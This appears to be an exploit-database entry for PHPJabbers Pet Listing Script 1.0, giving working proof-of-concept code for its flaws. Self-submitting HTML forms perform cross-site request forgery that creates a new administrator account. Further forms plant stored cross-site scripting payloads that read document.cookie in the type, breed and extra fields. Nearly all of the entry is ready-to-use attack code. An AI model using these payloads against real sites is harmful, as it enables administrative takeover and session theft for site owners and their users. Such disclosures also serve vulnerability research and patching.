PHPJabbers Pet Listing Script V1.0 - Multiple Vulnerabilties

2014-01-15T00:00:00
ID 1337DAY-ID-21765
Type zdt
Reporter HackXBack
Modified 2014-01-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Pet Listing Script V1.0 - Multiple Vulnerabilties
====================================================================
 
####################################################################
.:. Author         : HackXBack 
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/pet-listing-script/
.:. Tested On Demo : http://www.phpjabbers.com/demo/pl_10/index.php?controller=Admin&action=login
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery 
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="Password"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html>

[2] Multiple Cross Site Scripting
==================================

# CSRF with XSS Exploit:

I. Xss In Type 

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=AdminTypes&action=create">
<input type="hidden" name="type_create" value="1"/>
<input type="hidden" name="type_title" value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>

II. Xss In Breed

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=AdminBreeds&action=create">
<input type="hidden" name="breed_create" value="1"/>
<input type="hidden" name="breed_title" value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="type_id" value="2"/>
</form>
</body>
</html>

III. Xss In Extra

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=AdminExtras&action=create">
<input type="hidden" name="extra_create" value="1"/>
<input type="hidden" name="extra_title" value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
####################################################################

#  0day.today [2016-04-20]  #